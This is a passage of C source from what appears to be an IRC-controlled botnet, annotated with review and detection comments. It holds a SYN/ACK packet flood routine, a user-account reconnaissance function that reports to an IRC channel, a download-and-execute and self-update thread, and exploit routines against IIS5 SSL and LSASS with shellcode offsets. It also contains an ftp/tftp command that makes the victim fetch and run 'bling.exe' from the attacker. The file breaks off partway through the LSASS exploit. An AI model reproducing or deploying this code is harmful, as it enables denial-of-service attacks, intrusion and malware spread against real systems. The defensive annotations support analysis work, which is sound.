		((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); 
		tcpHeader.sport=fhtons((unsigned short)(rand()%1025));  
		tcpHeader.seq=fhtonl(0x12345678); 
		// Flag selection is by substring match on tcpflood.type.  If the type
		// matches none of "syn"/"ack"/"random", ack_seq and flags are left
		// unassigned (see the note on tcpHeader above).
		if (strstr(tcpflood.type,"syn")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=SYN;
		} else if (strstr(tcpflood.type,"ack")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=ACK;
		} else if (strstr(tcpflood.type,"random")) {
			tcpHeader.ack_seq=rand()%3;
			((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
		}
		tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 
		tcpHeader.window=fhtons(512); 
		tcpHeader.urg_ptr=0; 
		tcpHeader.checksum=0;
		
		// Pseudo-header used only to compute the TCP checksum.
		psdHeader.saddr=ipHeader.sourceIP; 
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); 

		// Pass 1: pseudo-header + TCP header -> TCP checksum.
		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); 
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
		// Pass 2: real IP header + TCP header (+4 zero bytes) -> IP checksum,
		// then the finished IP header is copied back in front.
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 

		// Whole 60-byte buffer is sent regardless of the header sizes.
		if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { 
			fclosesocket(ssock);

			_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
			if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
			addlog(sendbuf);

			clearthread(tcpflood.threadnum);

			ExitThread(0);
		}
		sent++;
	}
	fclosesocket(ssock);

	// Summary line.  NOTE(review): the rate divides by tcpflood.time, which
	// is 0 when a zero duration was requested (the loop still ran once), and
	// `sent * sizeof(szSendBuf)` is a size_t printed with %d.
	sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
	if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
	addlog(sendbuf);

	clearthread(tcpflood.threadnum);

	ExitThread(0); 
}
// Account reconnaissance: fetches one user record from `ServerName` with
// NetUserGetInfo at information level 11 and reports every USER_INFO_11
// field to the IRC channel, one message per field.
//   ServerName / Username - narrow strings, converted by AsWideString()
//                           (defined elsewhere) for the wide Net API.
//   sock / chan / notice  - IRC destination for irc_privmsg().
// Returns the NET_API_STATUS from fNetUserGetInfo (NERR_Success on success);
// on any other status a single error line carrying the code is sent instead.
// The record buffer is owned by the Net API and released with
// fNetApiBufferFree() before returning.
// Defensive note: with a remote ServerName this is a network SAM lookup and
// is observable on the queried host (which audit event fires depends on that
// host's audit policy — confirm for the platform in question).
NET_API_STATUS UserInfo(char *ServerName, char *Username, SOCKET sock, char *chan, BOOL notice)
{
	char buffer[IRCLINE], *user_priv;

	LPUSER_INFO_11 pBuf = NULL;
	DWORD dwLevel = 11;
	LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);
	LPWSTR wUsername = (LPWSTR)AsWideString(Username);
	
	NET_API_STATUS nStatus = fNetUserGetInfo(wServerName,wUsername,dwLevel,(LPBYTE *)&pBuf);

	if (nStatus == NERR_Success) {
		if (pBuf != NULL) {
			// Each wide field is formatted with %S into the fixed IRCLINE
			// buffer.  NOTE(review): sprintf is unbounded here, and the field
			// lengths are decided by the queried server, not by this code.
			sprintf(buffer,"Account: %S",pBuf->usri11_name);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Full Name: %S",pBuf->usri11_full_name);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"User Comment: %S",pBuf->usri11_usr_comment);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Comment: %S",pBuf->usri11_comment);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			// Map the USER_PRIV_* level to a label; `default` keeps user_priv
			// initialised for the sprintf below.
			switch(pBuf->usri11_priv) {
			case USER_PRIV_GUEST: 
				user_priv = TEXT("Guest"); 
				break;
			case USER_PRIV_USER:
				user_priv = TEXT("User");
				break;
			case USER_PRIV_ADMIN: 
				user_priv = TEXT("Administrator");
				break;
			default:
				user_priv = TEXT("Unknown");
				break;
			}
			sprintf(buffer,"Privilege Level: %s",user_priv);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Auth Flags: %d",pBuf->usri11_auth_flags);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Home Directory: %S",pBuf->usri11_home_dir);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Parameters: %S",pBuf->usri11_parms);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			// Time-like fields are reported as raw integers, not formatted.
			sprintf(buffer,"Password Age: %d",pBuf->usri11_password_age);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Bad Password Count: %d",pBuf->usri11_bad_pw_count);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Number of Logins: %d",pBuf->usri11_num_logons);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Last Logon: %d",pBuf->usri11_last_logon);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Last Logoff: %d",pBuf->usri11_last_logoff);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Logon Server: %S",pBuf->usri11_logon_server);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Workstations: %S",pBuf->usri11_workstations);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Country Code: %d",pBuf->usri11_country_code);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"User's Language: %d",pBuf->usri11_code_page);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Max. Storage: %d",pBuf->usri11_max_storage);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
			sprintf(buffer,"Units Per Week: %d",pBuf->usri11_units_per_week);
			irc_privmsg(sock,chan,buffer,notice,TRUE);
		}
	}
	else {
		// Error line uses IRC colour/bold control bytes; only the numeric
		// status is reported.
		sprintf(buffer,"-\x03\x34\2net\2\x03- user info error <%ld>",nStatus);
		irc_privmsg(sock,chan,buffer,notice);
	}

	if (pBuf != NULL)
		fNetApiBufferFree(pBuf);

	return (nStatus);
}
// Download / self-update thread.
// Fetches dl.url through WinINet (handle `ih`, opened elsewhere) into the
// local file dl.dest, then either launches it (dl.run) or, in update mode
// (dl.update == 1), starts it as the replacement binary and removes the
// running instance.  `param` is a DOWNLOAD block copied locally; dls->gotinfo
// tells the owner the block may be reused.
// Optional integrity checks: dl.filelen (exact byte count) and dl.expectedcrc
// (crc32f over the written file); a failed check jumps to `badfile` and the
// file is neither run nor reported as downloaded.
// Optional dl.encrypted: each chunk is passed through Xorbuff() before it is
// written (the transform itself lives elsewhere).
// Always terminates via ExitThread(0); never returns a value.
// Defensive note: nothing about the content is validated beyond size/CRC —
// whatever arrives is written to disk and executed — so file-write followed
// by process-creation from this process is the practical detection point.
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	DOWNLOAD dl = *((DOWNLOAD *)param);
	DOWNLOAD *dls = (DOWNLOAD *)param;
	dls->gotinfo = TRUE;

	HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
	if (fh != NULL) {
		// open the file
		HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		// make sure that our file handle is valid
		// NOTE(review): CreateFile reports failure as INVALID_HANDLE_VALUE,
		// i.e. (HANDLE)-1, which this comparison is unlikely to catch; it
		// effectively only rejects a NULL handle.  On this path the WinINet
		// handle `fh` is also left open (the close at `badfile` is skipped).
		if (f < (HANDLE)1) {
			sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
			if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
			addlog(buffer);

			clearthread(dl.threadnum);

			ExitThread(0);;
		}

		total = 0;
		start = GetTickCount();

		// Copy of the first 500 KB of the payload.  It is filled below and
		// freed, but only ever read by the commented-out CRC block; malloc's
		// result is not checked.
		char *fileTotBuff=(char *)malloc(512000);	//FIX ME: Only checks first 500 kb
		do {
			memset(buffer, 0, sizeof(buffer));
			// Return value is not checked; `r` is the byte count read.
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			if (dl.encrypted)
				Xorbuff(buffer,r);
			WriteFile(f, buffer, r, &d, NULL);
			
			if ((total) < 512000) {
				//We have free bytes...
				//512000-total
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
			// Abort early once more bytes than the announced length arrived.
			if (dl.filelen) 
				if (total>dl.filelen) 
					break; //er, we have a problem... filesize is too big.
			// Progress is written into the bot's thread table entry, so the
			// URL and byte count are visible through the thread listing.
			if (dl.update != 1) 
				sprintf(threads[dl.threadnum].name, "[Download]: Download: %s (%dKB transferred).", dl.url, total / 1024);
			else 
				sprintf(threads[dl.threadnum].name, "[Download]: Update: %s (%dKB transferred).", dl.url, total / 1024);
		} while (r > 0);

		BOOL goodfile=TRUE;

		// Length check: exact match required when a length was supplied.
		if (dl.filelen) {
			if (total!=dl.filelen) {
				goodfile=FALSE;
				sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
				irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
				addlog(buffer);
			}
		}
		// +1 keeps the divisor non-zero for sub-second downloads.
		speed = total / (((GetTickCount() - start) / 1000) + 1);
		CloseHandle(f);

		/* if (dl.expectedcrc) {
			unsigned long crc,crclength;
			sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
			crclength=total;
			if (crclength>512000) crclength=512000;
			crc=crc32(fileTotBuff,crclength);
			if (crc!=dl.expectedcrc) {
				goodfile=FALSE;
				irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
			}
			
		} */
		free(fileTotBuff);
		
		// CRC check over the file on disk (crc32f defined elsewhere).
		if (dl.expectedcrc) { 
			unsigned long crc=crc32f(dl.dest); 
			if (crc!=dl.expectedcrc) { 
				goodfile=FALSE;
				sprintf(buffer,"[DOWNLOAD]: CRC Fallito (%d != %d).", crc, dl.expectedcrc);
				irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); 
				addlog(buffer);
			} 
		} 

		if (goodfile==FALSE) 
			goto badfile;
		
		//download isn't an update
		if (dl.update != 1) {
			sprintf(buffer, "[DOWNLOAD]: D0S Downloaded %.1f KB in %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// dl.run: execute the downloaded file via the shell "open" verb.
			if (dl.run == 1) {
				fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW);
				if (!dl.silent) {
					sprintf(buffer,"[DOWNLOAD]: Apro Il File : %s.",dl.dest);
					irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
					addlog(buffer);
				}
			}

		// download is an update
		} else {
			sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB in %s @ %.1fKB/sec. Updato.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// The replacement is started hidden and detached; if that
			// succeeds the current instance tears down networking, runs
			// uninstall() (defined elsewhere) and exits the whole process.
			PROCESS_INFORMATION pinfo;
			STARTUPINFO sinfo;
			memset(&pinfo, 0, sizeof(pinfo));
			memset(&sinfo, 0, sizeof(sinfo));
			sinfo.lpTitle = "";
			sinfo.cb = sizeof(sinfo);
			sinfo.dwFlags = STARTF_USESHOWWINDOW;
			sinfo.wShowWindow = SW_HIDE;

			if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) {
				fWSACleanup();
				uninstall();
				ExitProcess(EXIT_SUCCESS);
			} else {
				sprintf(buffer,"[DOWNLOAD]: Update Fallito: Errore Nell'Apertura Del File: %s.",dl.dest);
				if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
				addlog(buffer);
			}
		}
	} else {
		sprintf(buffer,"[DOWNLOAD]: Link o DnS Non Trovato SUKKIAMELO!: %s.",dl.url);
		if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
		addlog(buffer);
	}

	// Common exit (also the target of the failed-integrity jump).
	badfile:
	fInternetCloseHandle(fh);

	clearthread(dl.threadnum);

	ExitThread(0);
}
// Issues a single HTTP request for visit.host (with visit.referer as the
// Referer) and reports the outcome to IRC.  `param` is a `vs` block copied
// locally; vsp->gotinfo releases it to the owner.  The do { ... } while(0)
// is a one-pass block used for early exit, and every exit path assigns
// sendbuf before the report below.  Always ends with ExitThread(0).
// Presumably used to generate page hits / referrer traffic — inferred from
// the name and the explicit Referer argument, not established here.
DWORD WINAPI visit(LPVOID param)
{
	HINTERNET ch = 0, req = 0;

	const char *accept = "*/*";
	char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];

	vs visit = *((vs *)param);
	vs *vsp = (vs *)param;
	vsp->gotinfo = TRUE;

	// zero out string varaiables
	// (the strncpy calls below rely on this zero fill for NUL termination)
	memset(vhost, 0, sizeof(vhost));
	memset(vuser, 0, sizeof(vuser));
	memset(vpass, 0, sizeof(vpass));
	memset(vpath, 0, sizeof(vpath));

	// zero out url structure and set options
	// Non-zero lengths with NULL buffers ask InternetCrackUrl to hand back
	// pointers into visit.host and overwrite the lengths with the real
	// component lengths.
	URL_COMPONENTS url;
	memset(&url, 0, sizeof(url));
	url.dwStructSize = sizeof(url);
	url.dwHostNameLength = 1;
    url.dwUserNameLength = 1;
    url.dwPasswordLength = 1;
    url.dwUrlPathLength = 1;

	do {
		// crack the url (break it into its main parts)
		if (!fInternetCrackUrl(visit.host, strlen(visit.host), 0, &url)) {
			sprintf(sendbuf,"[VISIT]: Invalid URL.");
			break;
		}

		// copy url parts into variables
		// NOTE(review): each copy length is the cracked component length,
		// not bounded by the destination size (128/128/128/256 bytes), so a
		// long URL component overruns the local buffer.
		if (url.dwHostNameLength > 0) 
			strncpy(vhost, url.lpszHostName, url.dwHostNameLength);
		int vport = url.nPort;
		if (url.dwUserNameLength > 0) 
			strncpy(vuser, url.lpszUserName, url.dwUserNameLength);
		if (url.dwPasswordLength > 0) 
			strncpy(vpass, url.lpszPassword, url.dwPasswordLength);
		if (url.dwUrlPathLength > 0) 
			strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);

		// `ih` is the process-wide WinINet session opened elsewhere.
		ch = fInternetConnect(ih, vhost,(unsigned short)vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
		if (ch == NULL) {
			sprintf(sendbuf,"[VISIT]: Could not open a connection.");
			break;
		}

		// NULL verb = GET; INTERNET_FLAG_NO_UI suppresses any dialogs.
		req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.referer, &accept, INTERNET_FLAG_NO_UI, 0);
		if (req == NULL) {
			sprintf(sendbuf,"[VISIT]: Failed to connect to HTTP server.");
			break;
		}

		// The response body is never read; only send success is reported.
		if (fHttpSendRequest(req, NULL, 0, NULL, 0))
			sprintf(sendbuf,"[VISIT]: URL visited.");
		else
			sprintf(sendbuf,"[VISIT]: Failed to get requested URL from HTTP server.");		
	} while(0); // always false, so this never loops, only helps make error handling easier

	if (!visit.silent) irc_privmsg(visit.sock, visit.chan, sendbuf, visit.notice);
	addlog(sendbuf);

	// Both handles are closed unconditionally (they may still be 0).
	fInternetCloseHandle(ch);
	fInternetCloseHandle(req);

	clearthread(visit.threadnum);

	ExitThread(0);
}
// Exploit routine against IIS 5 over SSL, dispatched through the exploit[]
// table (exinfo.exploit indexes it).  The payload strings `jumper`,
// `bind_shell_code` and `shellcode`, plus `filename` and FTP_PORT, are
// defined elsewhere in the file.  Because the remote OS is not fingerprinted
// (see the FIX ME below) every entry of offsets[] is tried in turn.
// Returns TRUE once the follow-up command has been sent to a shell on the
// target, FALSE otherwise.  `badbuffer` (malloc'd) is never freed.
// Detection notes, all literal in this function: the request starts with
// the 17-byte `request` prefix; a successful attempt is followed by a fresh
// TCP connection from the attacker to port 1981 on the target; the command
// delivered there writes an ftp script file named `o` and fetches/launches
// `bling.exe` (or pulls `filename` with tftp, depending on build flags);
// the bot logs "[<exploit name>]: Exploiting IP: <ip>".
BOOL IIS5SSL(EXINFO exinfo)
{
	char buffer[IRCLINE];
	char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

	// Per-service-pack addresses, stored XORed with 0xffffffff and decoded
	// just before use.
	unsigned long XOR=0xffffffff;
	unsigned long offsets[] = {	
		0x6741a1cd,		// Win2K SP0
		0x6741a199,		// Win2K SP1
		0x6741a426,		// Win2K SP2
		0x67419e1d,		// Win2K SP3
		0x67419ce8,		// Win2K SP4
		0x0ffb7de9,		// WinXP SP0
		0x0ffb832f		// WinXP SP1
	};

	BOOL bRet = FALSE;

	// Assemble the fixed part of the payload once; `p` is left pointing just
	// past the request prefix and the per-attempt bytes are appended to it.
	unsigned char *badbuffer=(unsigned char*)malloc(347); 
	memset(badbuffer, 0, 347);
	unsigned char *p=badbuffer; 
	memcpy(p, request, sizeof(request));
	p+=sizeof(request)-1; 
	strcat((char*)p, jumper);
	strcat((char*)p, bind_shell_code);

	SOCKET sSock;
	if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;

		// FIX ME: since i didnt found a way to determine the remote OS, i
		//		   placed this all together in a loop. this aint the best way
		//		   i'm sure about that
		// Element count is derived from sizeof(LPTSTR), not sizeof(offsets[0]);
		// the two only agree where a pointer and an unsigned long are the same
		// size.  Note that the loop appends to `p` on every iteration without
		// resetting it.
		for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) {
			memset(&ssin, 0, sizeof(ssin));
			ssin.sin_family = AF_INET;
			ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
			ssin.sin_port = fhtons(exinfo.port);

			if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
				offsets[i]^=XOR; 
				strncat((char*)p, (char*)&offsets[i], 4);
				strcat((char*)p, shellcode);

				if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) { 
					Sleep(1000); 
					fclosesocket(sSock);
			
					// Second connection: to the listener the payload is
					// expected to have opened on TCP 1981.  The same (already
					// closed) socket handle is reused for it.
					memset(&ssin, 0, sizeof(ssin));
					ssin.sin_family = AF_INET;
					ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
					ssin.sin_port = fhtons(1981);

					if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
						char cmd_buff[400];

						// Both blocks compile unless NO_TFTPD / NO_FTPD is
						// defined; when both are present the second
						// _snprintf overwrites the first, so the ftp
						// variant is what gets sent.
						#ifndef NO_TFTPD
						_snprintf(cmd_buff, sizeof (cmd_buff),
							"tftp -i %s get %s\r\n",
							GetIP(exinfo.sock),filename, filename);	
						#endif
						#ifndef NO_FTPD
						_snprintf(cmd_buff, sizeof (cmd_buff),
							"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
							GetIP(exinfo.sock),FTP_PORT);	
						#endif
							
						if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) {
							Sleep(500);

							if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
								fclosesocket(sSock);

								bRet = TRUE;
								_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
								if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
								addlog(buffer);

								break;
							}
						}
					}
				}
			}
			fclosesocket(sSock);
		}
	}

	return (bRet);
}
// Exploit routine against the LSASS service (second variant in this file).
// Flow: fingerprint the target with FpHost(FP_RPC) and pick a profile from
// ttargetx[] (0 for XP, otherwise 1 or 2 chosen at random 9:1), open an SMB
// session to \\<ip>\ipc$ using the reqx1..reqx9 / shitx* templates defined
// elsewhere, send the overflow payload, then connect to the listener the
// payload is expected to open on LSASS_BSPORT and deliver the ftp download
// command.  Returns TRUE only after that command was sent; every failure
// path closes the open socket(s) and returns FALSE.
// The responses read into recvbuf are never examined (`len` is assigned
// and discarded) — the SMB exchange is fire-and-forget.
// Detection notes, all literal here: a tree connect to the target's ipc$
// share, then a new inbound TCP connection to LSASS_BSPORT, then an ftp
// script file named `o` and `bling.exe` on the target; the bot logs
// "[<exploit name>]: Exploiting IP: <ip>" and increments exploit[].stats.
BOOL lsass2(EXINFO exinfo)
{
	int i, targetx, len, targetxOS;

	char hostipc[40];
	char hostipc2[40*2];
	char buf[LEN+1];
	char sendbuf[(LEN+1)*2];
	char req4u[sizeof(reqx4)+20];
	char screq[BUFSIZE+sizeof(reqx7)+1500+440];
	char screq2k[4348+4060];
	char screq2k2[4348+4060];
	char recvbuf[1600];
	char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
	char strBuffer[BUFSIZE];

	char buffer[IRCLINE], cmd_buff[400];

	// Single-byte SMB length fields patched into req4u below.
	char smblen;
	char unclen;

	unsigned short port;

	SOCKET sSocket, bSocket;
	SOCKADDR_IN ssin, bsin;

	// Unknown and NT hosts are skipped outright.
	targetxOS = FpHost(exinfo.ip, FP_RPC);
	if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
		return FALSE;

	if (targetxOS == OS_WINXP)
		targetx = 0;
	else if (rand() % 10)
		targetx = 1;
	else
		targetx = 2;

	// UNC path of the IPC share, then the same text widened to UTF-16LE by
	// interleaving zero bytes (hostipc2).
	_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);

	for (i=0; i<40; i++) {
		hostipc2[i*2] = hostipc[i];
		hostipc2[i*2+1] = 0;
	}

	// Tree-connect request: template reqx4 with the wide UNC path spliced in
	// and the two length bytes recomputed.
	memcpy(req4u, reqx4, sizeof(reqx4)-1);
	memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
	memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);

	smblen = 52+(char)strlen(hostipc)*2;
	memcpy(req4u+3, &smblen, 1);

	unclen = 9 + (char)strlen(hostipc)*2;
	memcpy(req4u+45, &unclen, 1);

	// The listener port is patched into the bindshell string (encoded with
	// 0x9999); it is the same LSASS_BSPORT dialled further down.
	port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
	memcpy(&bindshell[176], &port, 2);

	// Build the payload for the chosen profile (two layouts: the wide
	// `sendbuf` form for targets 1/2, `strBuffer` for target 0).
	if ((targetx == 1) || (targetx == 2)) {
		memset(buf, NOP, LEN);

		//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
		memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
		memcpy(&buf[2036], &bindshell, strlen(bindshell));

		memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
		memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
		//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr

		memcpy(&buf[2856], &bindshell, strlen(bindshell));

		for (i=0; i<LEN; i++) {
			sendbuf[i*2] = buf[i];
			sendbuf[i*2+1] = 0;
		}
		sendbuf[LEN*2]=0;
		sendbuf[LEN*2+1]=0;

		memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
		memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);

	} else {
		memset(strBuffer, NOP, BUFSIZE);
		memcpy(strBuffer+160, bindshell, strlen(bindshell));
		memcpy(strBuffer+1980, strasm, strlen(strasm));
		*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
	}

	memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);

	// Note: fsocket failure is compared against SOCKET_ERROR here (and for
	// bSocket below) rather than INVALID_SOCKET.
	if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
		return FALSE;

	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)exinfo.port);
	ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

	if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
		fclosesocket(sSocket);
		return FALSE;
	}

	// SMB handshake: negotiate / session setup / tree connect / pipe setup,
	// one template per step, each reply read and discarded.
	if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	// Payload delivery: two requests (4348 + 4060 bytes) for targets 1/2,
	// a single request for target 0.
	if ((targetx == 1) || (targetx == 2)) {
		memcpy(screq2k, reqx8, sizeof(reqx8)-1);
		memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);

		memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
		memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);

		memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);

		if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}
		len = frecv(sSocket, recvbuf, 1600, 0);

		if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}

	} else {
		memcpy(screq, reqx7, sizeof(reqx7)-1);
		memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
		memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);

		screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
		if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}
	}

	len = frecv(sSocket, recvbuf, 1600, 0);

	// Second connection, to the listener on LSASS_BSPORT.
	if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}

	memset(&bsin, 0, sizeof(bsin));
	bsin.sin_family = AF_INET;
	bsin.sin_port = fhtons(LSASS_BSPORT);
	bsin.sin_addr.s_addr = finet_addr(exinfo.ip);

	if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
		fclosesocket(sSocket);
		fclosesocket(bSocket);
		return FALSE;
	}

	// Success is assumed once the listener sends anything back; the command
	// makes the target fetch bling.exe over ftp from the bot's own address
